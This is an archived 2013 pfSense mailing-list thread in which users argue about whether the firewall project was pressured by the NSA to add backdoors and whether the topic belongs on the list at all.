Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 10/10/2013 09:38, Thinker Rix wrote: On 2013-10-10 01:13, Przemysław Pawełczyk wrote: On Thu, 10 Oct 2013 00:05:22 +0300 Thinker Rix thinke...@rocketmail.com wrote: Well, actually I started this thread with a pretty frank, straight-forward and very simple question. That's right and they were justified. Thank you! BTW, you pushed to the corner the (un)famous American hubris (Obama: US is exceptional.), that's the nasty answers from some. Yes, I guess I have hit a whole bunch of different nerves with my question, and I find it to be highly interesting to observe some of the awkward reactions, socioscientifically and psychologically. I have been insulted, I have been bullied, I have been called to self-censor myself and at the end some users virtually joined to give the illusion of a majority and muzzle me, stating, that my question has no place at this pfSense mailing list. Really amazing, partly hilarious reactions, I think. These reactions say so much about how far the whole surveillance and mind-suppression has proceeded already and how much it has influenced the thoughts and behavior of formerly free people by now. Frightening. Thinker Rix, you are not alone at your unease pressing you to ask those questions about pfSense and NSA. Thank you for showing your support openly! I too was surprised to see some activity on the pfsense list, after seeing only a few posts per week I checked today to find several dozen messages talking about a topic I have been concerned with myself - as a network security specialist, how much can I trust the firewalls I use, be they embedded devices, software packages, or 'hardware' from manufacturers. There are many on-topic things to discuss here: 1. Which Ciphers Transforms should we now consider secure (pfsense provides quite a few cipher choices over some other off the shelf hardware). 2.
What hardware / software configuration changes can we consider to improve RNG and ensure that should we increase the bit size of our encryption, reduce lifetimes of our SAs that we can still ensure we have enough entropy in the RNG on a device that is typically starved of traditional entropy sources. This is so much on-topic, I am surprised that there has been a movement to call this thread to stop, granted - it may seem that the conversation may drift into a political one, with regard to privacy law etc... however, that is a valid sub-topic for a discussion list that addresses devices that are designed and implemented to safe-guard privacy. -- Regards, Giles Coochey, CCNP, CCNA, CCNAS NetSecSpec Ltd +44 (0) 8444 780677 +44 (0) 7983 877438 http://www.coochey.net http://www.netsecspec.co.uk gi...@coochey.net ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hi Giles On 2013-10-10 12:39, Giles Coochey wrote: On 10/10/2013 09:38, Thinker Rix wrote: On 2013-10-10 01:13, Przemysław Pawełczyk wrote: On Thu, 10 Oct 2013 00:05:22 +0300 Thinker Rix thinke...@rocketmail.com wrote: Well, actually I started this thread with a pretty frank, straight-forward and very simple question. That's right and they were justified. Thank you! BTW, you pushed to the corner the (un)famous American hubris (Obama: US is exceptional.), that's the nasty answers from some. Yes, I guess I have hit a whole bunch of different nerves with my question, and I find it to be highly interesting to observe some of the awkward reactions, socioscientifically and psychologically. I have been insulted, I have been bullied, I have been called to self-censor myself and at the end some users virtually joined to give the illusion of a majority and muzzle me, stating, that my question has no place at this pfSense mailing list. Really amazing, partly hilarious reactions, I think. These reactions say so much about how far the whole surveillance and mind-suppression has proceeded already and how much it has influenced the thoughts and behavior of formerly free people by now. Frightening. Thinker Rix, you are not alone at your unease pressing you to ask those questions about pfSense and NSA. Thank you for showing your support openly! I too was surprised to see some activity on the pfsense list, after seeing only a few posts per week I checked today to find several dozen messages talking about a topic I have been concerned with myself - as a network security specialist, how much can I trust the firewalls I use, be they embedded devices, software packages, or 'hardware' from manufacturers. Exactly. The firewall is the neuralgic point of each of the networks that we administer. Thinking - and talking - about its integrity is the most natural and most important thing on earth, IMO. There are many on-topic things to discuss here: 1.
Which Ciphers Transforms should we now consider secure (pfsense provides quite a few cipher choices over some other off the shelf hardware). 2. What hardware / software configuration changes can we consider to improve RNG and ensure that should we increase the bit size of our encryption, reduce lifetimes of our SAs that we can still ensure we have enough entropy in the RNG on a device that is typically starved of traditional entropy sources. You made some highly relevant and interesting suggestions here, and I sincerely hope that a fruitful discussion will develop upon this so that we all can benefit of it! This is so much on-topic, I am surprised that there has been a movement to call this thread to stop, granted - it may seem that the conversation may drift into a political one, with regard to privacy law etc... however, that is a valid sub-topic for a discussion list that addresses devices that are designed and implemented to safe-guard privacy. This echoes my sentiments exactly! Regards Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
This discussion about security/NSA/encryption IS important. Please go on. Sent from Samsung Mobile Original message From: Giles Coochey gi...@coochey.net Date: 10.10.2013 11:39 (GMT+01:00) To: list@lists.pfsense.org Subject: Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others? On 10/10/2013 09:38, Thinker Rix wrote: On 2013-10-10 01:13, Przemysław Pawełczyk wrote: On Thu, 10 Oct 2013 00:05:22 +0300 Thinker Rix thinke...@rocketmail.com wrote: Well, actually I started this thread with a pretty frank, straight-forward and very simple question. That's right and they were justified. Thank you! BTW, you pushed to the corner the (un)famous American hubris (Obama: US is exceptional.), that's the nasty answers from some. Yes, I guess I have hit a whole bunch of different nerves with my question, and I find it to be highly interesting to observe some of the awkward reactions, socioscientifically and psychologically. I have been insulted, I have been bullied, I have been called to self-censor myself and at the end some users virtually joined to give the illusion of a majority and muzzle me, stating, that my question has no place at this pfSense mailing list. Really amazing, partly hilarious reactions, I think. These reactions say so much about how far the whole surveillance and mind-suppression has proceeded already and how much it has influenced the thoughts and behavior of formerly free people by now. Frightening. Thinker Rix, you are not alone at your unease pressing you to ask those questions about pfSense and NSA. Thank you for showing your support openly! I too was surprised to see some activity on the pfsense list, after seeing only a few posts per week I checked today to find several dozen messages talking about a topic I have been concerned with myself - as a network security specialist, how much can I trust the firewalls I use, be they embedded devices, software packages, or 'hardware' from manufacturers.
There are many on-topic things to discuss here: 1. Which Ciphers Transforms should we now consider secure (pfsense provides quite a few cipher choices over some other off the shelf hardware). 2. What hardware / software configuration changes can we consider to improve RNG and ensure that should we increase the bit size of our encryption, reduce lifetimes of our SAs that we can still ensure we have enough entropy in the RNG on a device that is typically starved of traditional entropy sources. This is so much on-topic, I am surprised that there has been a movement to call this thread to stop, granted - it may seem that the conversation may drift into a political one, with regard to privacy law etc... however, that is a valid sub-topic for a discussion list that addresses devices that are designed and implemented to safe-guard privacy. -- Regards, Giles Coochey, CCNP, CCNA, CCNAS NetSecSpec Ltd +44 (0) 8444 780677 +44 (0) 7983 877438 http://www.coochey.net http://www.netsecspec.co.uk gi...@coochey.net
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-10 15:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. Ian, that is *your* opinion. As you can see, others here have a quite different opinion and they find this topic to be highly relevant for pfSense. Luckily this is an open mailing list, where everyone can pick the topics to read that interest him, so why you don't just walk away from this discussion instead of losing any time in telling others how uninteresting you find *their* discussion? And you even dare to tell us to go elsewhere... Who do you think you are? You are either a kind of sadomasochist - reading all day all kinds of discussions that do not interest you and telling the participants of that discussion that they should go elsewhere because they do not discuss what you find interesting and relevant - or you simply do not know how to use a mailing list properly. I suggest you go learn how to use a proper news/mailing-list reader. Hint: Threaded mode. Cheers Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 10/10/2013 13:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. I tried to turn this back into a product support discussion in the last thread but sadly my comments were not among those cherry picked. This discussion does not suit the purpose of this list. I see a bunch of hard working people reacting to their product's integrity being continuously questioned despite having all questions answered, and a few entitled consumers who can't be bothered to figure out technology well enough to come to their own conclusion on its integrity. As well as a bunch of people that want this discussion to go someplace more appropriate. The concerned parties are not concerned enough to learn how to read code. So you're paranoid, just not paranoid enough to actually learn how to answer your own questions. Unless there is an issue someone is having making a VPN work or getting NAT running right, this is the wrong place to hold this discussion. If you're having an issue with this pfSense, networking protocols, or logical operation of the device, great! let's talk about it! I'm actually very good at these things, and I'd like to spend time helping people with network or network security related operational problems. Otherwise, please find the email addresses of all the people who have shown an interest in participating in this discussion, and send an email out to that list of people to discuss it among yourselves.
*BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. The about list on the mailman page states: pfSense support and discussion list... This thread is clearly about discussing pfsense, therefore it is on-topic, I could equally take the stance, take your technical discussions to the dev list, however I am not the type of exclusive close-minded person that you appear to be. Please stop hijacking this thread. -- Regards, Giles Coochey, CCNP, CCNA, CCNAS NetSecSpec Ltd +44 (0) 8444 780677 +44 (0) 7983 877438 http://www.coochey.net http://www.netsecspec.co.uk gi...@coochey.net
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-10 16:08, Giles Coochey wrote: On 10/10/2013 13:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. I tried to turn this back into a product support discussion in the last thread but sadly my comments were not among those cherry picked. This discussion does not suit the purpose of this list. I see a bunch of hard working people reacting to their product's integrity being continuously questioned despite having all questions answered, and a few entitled consumers who can't be bothered to figure out technology well enough to come to their own conclusion on its integrity. As well as a bunch of people that want this discussion to go someplace more appropriate. The concerned parties are not concerned enough to learn how to read code. So you're paranoid, just not paranoid enough to actually learn how to answer your own questions. Unless there is an issue someone is having making a VPN work or getting NAT running right, this is the wrong place to hold this discussion. If you're having an issue with this pfSense, networking protocols, or logical operation of the device, great! let's talk about it! I'm actually very good at these things, and I'd like to spend time helping people with network or network security related operational problems. Otherwise, please find the email addresses of all the people who have shown an interest in participating in this discussion, and send an email out to that list of people to discuss it among yourselves.
*BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. This is *exactly* the way I feel about this whole sensation that we are witnessing here! Some reactions are truly incredible! The about list on the mailman page states: pfSense support and discussion list... Correct! But I guess those who waste our time by telling us we should shut up and walk away would like to rename the list to e.g. Happy shallow chatting of pfSense fan boys who never dare to ask any critical question about their beloved firewall-distro that they take to bed each night or something similar. Self-censorship in a security software forum when it comes to discuss the security level of the security software! It's absolutely crazy!! This thread is clearly about discussing pfsense, therefore it is on-topic, I could equally take the stance, take your technical discussions to the dev list, however I am not the type of exclusive close-minded person that you appear to be. Please stop hijacking this thread. FACK!! Regards Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Thu, Oct 10, 2013 at 9:07 AM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-10 15:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. Ian, that is *your* opinion. As you can see, others here have a quite different opinion and they find this topic to be highly relevant for pfSense. Luckily this is an open mailing list, where everyone can pick the topics to read that interest him, so why you don't just walk away from this discussion instead of losing any time in telling others how uninteresting you find *their* discussion? And you even dare to tell us to go elsewhere... Who do you think you are? You are either a kind of sadomasochist - reading all day all kinds of discussions that do not interest you and telling the participants of that discussion that they should go elsewhere because they do not discuss what you find interesting and relevant - or you simply do not know how to use a mailing list properly. I suggest you go learn how to use a proper news/mailing-list reader. Hint: Threaded mode. Cheers Thinker Rix Personal opinion is irrelevant! Here is my opinion of you. seriously? Who I think I am is a network security engineer. And I'm very good at what I do. I eat breathe and sleep network security, and I have tons of experience and expertise I'm willing to lend anyone. I do this free of charge, mostly in IRC, and occasionally even on this very mailing list. I'm still very interested in helping everyone, even hostile folks like yourself, with any technical problems they have. But you don't seem interested in that.
-Ian
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
I rarely participate in public political discussions but I have to say something: In the United States if the government sent someone an NSL - they would not be allowed to comment. You have been told that already and have been told that to the best knowledge of the people involved, no other requests have been received. You have turned this into a political discussion and I think at least I do not care about your political views. Yes, we all know NSA is evil and no, most of us do not like it. Now, do you have a technical question on how to protect yourself from the evil spooks? If not, please go away, this is becoming boring. Yes, it is an open public list but it does not mean it is your outlet to vent and abuse others. My $.02 On Thu, Oct 10, 2013 at 04:23:20PM +0300, Thinker Rix wrote: On 2013-10-10 16:08, Giles Coochey wrote: On 10/10/2013 13:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. I tried to turn this back into a product support discussion in the last thread but sadly my comments were not among those cherry picked. This discussion does not suit the purpose of this list. I see a bunch of hard working people reacting to their product's integrity being continuously questioned despite having all questions answered, and a few entitled consumers who can't be bothered to figure out technology well enough to come to their own conclusion on its integrity. As well as a bunch of people that want this discussion to go someplace more appropriate.
The concerned parties are not concerned enough to learn how to read code. So you're paranoid, just not paranoid enough to actually learn how to answer your own questions. Unless there is an issue someone is having making a VPN work or getting NAT running right, this is the wrong place to hold this discussion. If you're having an issue with this pfSense, networking protocols, or logical operation of the device, great! let's talk about it! I'm actually very good at these things, and I'd like to spend time helping people with network or network security related operational problems. Otherwise, please find the email addresses of all the people who have shown an interest in participating in this discussion, and send an email out to that list of people to discuss it among yourselves. *BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. This is *exactly* the way I feel about this whole sensation that we are witnessing here! Some reactions are truly incredible! The about list on the mailman page states: pfSense support and discussion list... Correct! But I guess those who waste our time by telling us we should shut up and walk away would like to rename the list to e.g. Happy shallow chatting of pfSense fan boys who never dare to ask any critical question about their beloved firewall-distro that they take to bed each night or something similar. Self-censorship in a security software forum when it comes to discuss the security level of the security software! It's absolutely crazy!! This thread is clearly about discussing pfsense, therefore it is on-topic, I could equally take the stance, take your technical discussions to the dev list, however I am not the type of exclusive close-minded person that you appear to be. Please stop hijacking this thread. FACK!!
Regards Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 10, 2013, at 9:08 AM, Giles Coochey gi...@coochey.net wrote: On 10/10/2013 13:55, Ian Bowers wrote: On Thu, Oct 10, 2013 at 8:17 AM, Alexandre Paradis alexandre.para...@gmail.com wrote: indeed, i vote to continue. Because you don't mind being overlooked by NSA doesn't mean everybody don't care. On Thu, Oct 10, 2013 at 7:33 AM, Rüdiger G. Biernat rgbier...@rgbiernat.homelinux.org wrote: This discussion about security/NSA/encryption IS important. Please go on. Whether or not this is an important conversation is irrelevant. This is the wrong place to have the conversation. I tried to turn this back into a product support discussion in the last thread but sadly my comments were not among those cherry picked. This discussion does not suit the purpose of this list. I see a bunch of hard working people reacting to their product's integrity being continuously questioned despite having all questions answered, and a few entitled consumers who can't be bothered to figure out technology well enough to come to their own conclusion on its integrity. As well as a bunch of people that want this discussion to go someplace more appropriate. The concerned parties are not concerned enough to learn how to read code. So you're paranoid, just not paranoid enough to actually learn how to answer your own questions. Unless there is an issue someone is having making a VPN work or getting NAT running right, this is the wrong place to hold this discussion. If you're having an issue with this pfSense, networking protocols, or logical operation of the device, great! let's talk about it! I'm actually very good at these things, and I'd like to spend time helping people with network or network security related operational problems. Otherwise, please find the email addresses of all the people who have shown an interest in participating in this discussion, and send an email out to that list of people to discuss it among yourselves.
*BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. Some people value the S/N ratio of mailing lists. I believe the people asking for the discussion to be moved elsewhere are motivated by that. As to people trying to query very valid points, even if we take that on face value, what do you or they hope to accomplish by asking the pfSense project directly whether they have been approached by the NSA? The reporting around the leaked NSA Files has established that one of the major concerns is the legal apparatus that enables the NSA to approach companies whilst compelling those companies not to reveal the fact. So, it's highly likely that had the pfSense project been approached, part of that approach would have included a mandate not to tell anyone. So how could a definitive answer be obtained given that silence from the pfSense project COULD be interpreted to mean yes but doesn't definitively mean yes. Some people have posited ways of evading such gag orders (e.g., http://www.theguardian.com/technology/2013/sep/09/nsa-sabotage-dead-mans-switch), but, AFAIK, they have not been battle-tested in court. I am left wondering, therefore, what it would take for people to accept that pfSense is trustworthy in a good-faith sense? The original poster in this thread asked for a direct answer to a straightforward question and he got it, yet still he continues to pursue this thread. To what end? People are outraged at the NSA revelations, but the pfSense mailing list is not the appropriate place to be outraged at that. Go comment at the news outlets. Write your elected officials. Support the EFF and the likes. But what more can be accomplished on this mailing list? 
There was an attempt to redirect the thread to something more practical and focused on pfSense, e.g., what now could be considered best practices settings to use for encryption, but it doesn't appear to be gaining much traction vs. this thread. (Part of that might be due to the fact that not much practical information is available right now.) As I've pointed out, the original thread query has been answered definitively (twice now). The original poster has said that the availability of the source code for scrutiny is not sufficient, but it seems that ultimately that is all you have to go on in open source projects. It's not clear to me what response it would take to establish trustworthiness in pfSense for the original poster and the others that are apparently being led to seriously reconsider the potential risk ... in continuing to use pfsense as a security tool. Maybe if we can establish that, we can finally wrap up this thread as far as pfSense is concerned and get back to a pfSense-focused mailing list. The about list on
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-10 16:52, Paul Mather wrote: On Oct 10, 2013, at 9:08 AM, Giles Coochey gi...@coochey.net wrote: *BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool. Some people value the S/N ratio of mailing lists. I believe the people asking for the discussion to be moved elsewhere are motivated by that. Those people should just learn how to use a mailing list properly, before using one. A mailing list is *not* just I enter my daily use email address somewhere and receive emails. For participating properly at a mailing list you need a proper mail reader that is able to sort mail into conversation threads (https://en.wikipedia.org/wiki/Conversation_threading). Then you go and pick the threads that interest you and read them. And you ignore those, who do not interest you. Additionally it is advised to use an email address only for reading mailing lists. Of course anyone can use a mailing list as he desires, e.g. by just subscribing to a mailing list with his daily use email address and then get his daily use email inbox spammed with tons of unsorted and un-threaded email about all sorts of discussion topics that are of no interest to him. Everyone's own choice! But please: Those people should not complain about receiving tons of email that do not interest them. And of course they can't tell others to talk only about topics that are of their own interest, that is ridiculous. Full stop. The original poster in this thread asked for a direct answer to a straightforward question and he got it, yet still he continues to pursue this thread. To what end? E, as long as a wish?! There is no quota on how long any member of this list is allowed to discuss a topic, is there? If you are not interested, just do not read this THREAD.
You don't use a conversation threaded email reader to participate to a mailing list? Not my problem, sorry. Go use one. See above. People are outraged at the NSA revelations, but the pfSense mailing list is not the appropriate place to be outraged at that. Sorry, this is not up to you to judge. I think that my question is very well related to pfSense and thus the mailing lists of pfSense is the right place to do so. And again: If you are not interested in this thread, DO NOT READ it. So simple actually?! Maybe if we can establish that, we can finally wrap up this thread as far as pfSense is concerned and get back to a pfSense-focused mailing list. You can switch *right at this very moment* to a discussion thread that is of more interest for you and there you go! Regards Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 10, 2013, at 10:13 AM, Thinker Rix thinke...@rocketmail.com wrote:

> On 2013-10-10 16:52, Paul Mather wrote:
>> On Oct 10, 2013, at 9:08 AM, Giles Coochey gi...@coochey.net wrote:
>>> *BLINK!* Incredible the way I am seeing the reaction to the initial question, and trying to query very valid points are now leading me to seriously reconsider the potential risk I have in continuing to use pfsense as a security tool.
>> Some people value the S/N ratio of mailing lists. I believe the people asking for the discussion to be moved elsewhere are motivated by that.
> Those people should just learn how to use a mailing list properly, before using one. A mailing list is *not* just I enter my daily use email address somewhere and receive emails. For participating properly at a mailing list you need a proper mail reader that is able to sort mail into conversation threads (https://en.wikipedia.org/wiki/Conversation_threading). Then you go and pick the threads that interest you and read them. And you ignore those, who do not interest you. Additionally it is advised to use an email address only for reading mailing lists.

Thank you for the valuable information about how to use mailing lists. I first started using mailing lists back in the mid/late 1980s, on the JANET network (British academic network)---back when the Internet was made up of networks like ARPA, BITNET, UUCP, and the likes and (in my case) you needed to know the gateway machines that would let you reach those networks and had to incorporate that routing into the recipient's e-mail address. I suspect those people you mention above actually know how to use a mailing list properly. I know I do. I also know the value of good S/N ratio on technically-focused mailing lists.

>> Maybe if we can establish that, we can finally wrap up this thread as far as pfSense is concerned and get back to a pfSense-focused mailing list.
> You can switch *right at this very moment* to a discussion thread that is of more interest for you and there you go!

Of course, you're right, and that is wise counsel because it reminds me of one of the golden rules of mailing lists: unwelcome threads persist only so long as people reply to them. (This is sometimes better known by the more insulting adage: Please don't feed the trolls! I'm loath to employ that, though.) I thought I was making a reasonable point, but it seems as far as I'm concerned, this thread has passed the point of reasonableness. I'll leave it to you and your fellow concerned list members to continue mulling it over, and, in your case, to continue teaching your grandma to suck eggs when it comes to Netiquette. :-)

Cheers,
Paul.
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hi Paul.

On 2013-10-10 18:42, Paul Mather wrote:

> Thank you for the valuable information about how to use mailing lists.

You are welcome! ;-)

> I first started using mailing lists back in the mid/late 1980s, on the JANET network (British academic network)---back when the Internet was made up of networks like ARPA, BITNET, UUCP, and the likes and (in my case) you needed to know the gateway machines that would let you reach those networks and had to incorporate that routing into the recipient's e-mail address.

I love it when users try to show off with what internet dinosaurs they are, as soon as someone tries to teach them how to do something better.. Well, I am an Internet Dinosaur, too, with quite a comparable track record as you, so I am not all too impressed ;-)

> I suspect those people you mention above actually know how to use a mailing list properly. I know I do.

Well, as it seems, most readers here *may know* how it should be done, but yet *don't do* it correctly, since it has shown that most users do just read all incoming mail unsorted and not threaded. While anybody has the right to do so - no one has the right to complain afterwards about drowning in mail that does not concern him. But awkwardly enough many users did complain. And I will not accept them blaming me for not using their mail readers correctly.

> I also know the value of good S/N ratio on technically-focused mailing lists.

Every user will consider different things to be noise. I do not consider this thread to be noise - at all. You do. Just read another thread that appeals to you more?

>>> Maybe if we can establish that, we can finally wrap up this thread as far as pfSense is concerned and get back to a pfSense-focused mailing list.
>> You can switch *right at this very moment* to a discussion thread that is of more interest for you and there you go!
> Of course, you're right, and that is wise counsel

It would have been a wise sentence, if it would have stopped here ;-)

> because it reminds me of one of the golden rules of mailing lists: unwelcome threads persist only so long as people reply to them. (This is sometimes better known by the more insulting adage: Please don't feed the trolls! I'm loath to employ that, though.) I thought I was making a reasonable point, but it seems as far as I'm concerned, this thread has passed the point of reasonableness.

FACK! The only difference is, that you consider me to be the troll (maybe because I backtalk without hesitation to those who try to muzzle and censor me?) - while I consider those to be the trolls, who do not contribute anything of value to the discussion but plainly interfere in this thread and bully the others to stop discussing about the topic, because they claim that it bores them - instead of just walking away.

> I'll leave it to you and your fellow concerned list members to continue mulling it over, and, in your case, to continue teaching your grandma to suck eggs when it comes to Netiquette. :-)

Thanks so much ;-) As far as Netiquette is concerned, I am surprised how many of those computer geeks that participate at this mailing list are clueless about Netiquette, and the basic usage of mail readers, etc. Take for an example how many postings are not quoting correctly, but have text on top - full quote below which is a no-go in newsgroups and mailing lists...

> Cheers, Paul.

Regards
Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 10, 2013, at 5:42 PM, Paul Mather p...@gromit.dlib.vt.edu wrote:

> I first started using mailing lists back in the mid/late 1980s,

You’re not the only one. :-) I too was entertained by the n00b trying to tell grandpa how to use email.

Jim
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Dear Worried user,

Since pfSense is opensource, please check the code and report back if there are any backdoors or nasty stuff in there. Thanks for being a conscientious user and not wanting to shift work onto others.

Mehma

On Wed, Oct 9, 2013 at 7:20 AM, Thinker Rix thinke...@rocketmail.com wrote:

> Dear pfsense-team, today I posted the following on your blog at http://blog.pfsense.org/?p=712
>
> “Worried User Says: Your comment is awaiting moderation. October 9th, 2013 at 7:55 am Hi guys, I want to ask if you have been approached by any US government officials, such as NSA, FBI, etc. and been asked/ forced to include any backdoors, spyware, loggers, etc. into pfsense and if you did so. Thank you Worried User”
>
> Some minutes later I could see that my entry was not released to the public - but deleted by the moderator, without any further comment. Please take a stand to this. Regards
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ?

Paul Kunicki
Network Administrator
SproutLoud Media Networks, LLC.
954-476-6211 ext.144
pkuni...@sproutloud.com

On Wed, Oct 9, 2013 at 10:20 AM, Thinker Rix thinke...@rocketmail.com wrote:

> Dear pfsense-team, today I posted the following on your blog at http://blog.pfsense.org/?p=712
>
> “Worried User Says: Your comment is awaiting moderation. October 9th, 2013 at 7:55 am Hi guys, I want to ask if you have been approached by any US government officials, such as NSA, FBI, etc. and been asked/ forced to include any backdoors, spyware, loggers, etc. into pfsense and if you did so. Thank you Worried User”
>
> Some minutes later I could see that my entry was not released to the public - but deleted by the moderator, without any further comment. Please take a stand to this. Regards
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
> Since pfSense is opensource, please check the code and report back if there are any backdoors or nasty stuff in there. Thanks for being a conscientious user and not wanting to shift work onto others.

To be honest, I understand the question from the worried user, especially if his comment is held in moderation. I also understand your point though, since the software is OSS, it should be fairly easy to check for backdoors :)

Regards,
Peter
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 11:20:11AM -0400, Paul Kunicki wrote:

> I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ?

Incorporated in the US, hence a legitimate target.

http://blog.pfsense.org/?p=714

Howdy, If you’ve downloaded pfSense 2.1, you might have noticed that the footer has changed. What used to say “BSD Perimeter” now says “ESF”. In early Spring it became apparent that we should consider a reorganization of the company. BSD Perimeter is still incorporated in Kentucky, but all of the directors and owners live in Texas. Re-incorporating gave us chance to clean up a few issues, and to change the name, signaling a break with the past.

If you're really paranoid, you can always export the pf rules, and run it on a headless FreeBSD or OpenBSD box.
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 18:20, Paul Kunicki wrote:

> I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response

Exactly, Paul, you got my point!

> although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ?

@your doubts about the NSA/FBI/put the name of your government's surveillance institution here bothering with smaller companies such as Electric Sheep Fencing LLC (formerly BSD perimeter) and their niche product pfSense: Please take these 2 things into account:

1. Recently they forced the small encrypted-email-service Lavabit to comply with them (hand out their SSL-masterkeys and install a black-box at their premises). Lavabit did not agree - and they shut him down. https://en.wikipedia.org/wiki/Lavabit. Officially they wanted to force Lavabit to just hand out Edward Snowden's emails (bad enough), but in reality they wanted to gain access to all emails of Lavabit by receiving the SSL masterkeys and by placing the blackbox at their premises, which rendered the whole service useless.

2. Routers/Gateways/Firewalls are highly interesting for big brother. Read e.g. this article "NSA Laughs at PCs, Prefers Hacking Routers and Switches" (https://mailman.stanford.edu/pipermail/liberationtech/2013-September/011287.html)

So, combining those 2 facts - the fact that the NSA/FBI/etc. prefer to infiltrate routers with the fact that they very well bother knocking the doors of small businesses with niche products, I guess my question is quite legitimate!

Greetings
Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
(TIC mode: on)

I think it’s obvious that:

- ESF is a front for the NSA
- the acquisition which closed last year was really just about gaining control of a critical component of Internet infrastructure.
- the delays getting 2.1 out the door were exclusively about getting some last-minute backdoor code installed.

AYBAB2U, baby!

(TIC mode: off)

On Oct 9, 2013, at 5:56 PM, Thinker Rix thinke...@rocketmail.com wrote:

> On 2013-10-09 18:20, Paul Kunicki wrote:
>> I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response
> Exactly, Paul, you got my point!
>> although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment ?
> @your doubts about the NSA/FBI/put the name of your government's surveillance institution here bothering with smaller companies such as Electric Sheep Fencing LLC (formerly BSD perimeter) and their niche product pfSense: Please take these 2 things into account:
>
> 1. Recently they forced the small encrypted-email-service Lavabit to comply with them (hand out their SSL-masterkeys and install a black-box at their premises). Lavabit did not agree - and they shut him down. https://en.wikipedia.org/wiki/Lavabit. Officially they wanted to force Lavabit to just hand out Edward Snowden's emails (bad enough), but in reality they wanted to gain access to all emails of Lavabit by receiving the SSL masterkeys and by placing the blackbox at their premises, which rendered the whole service useless.
>
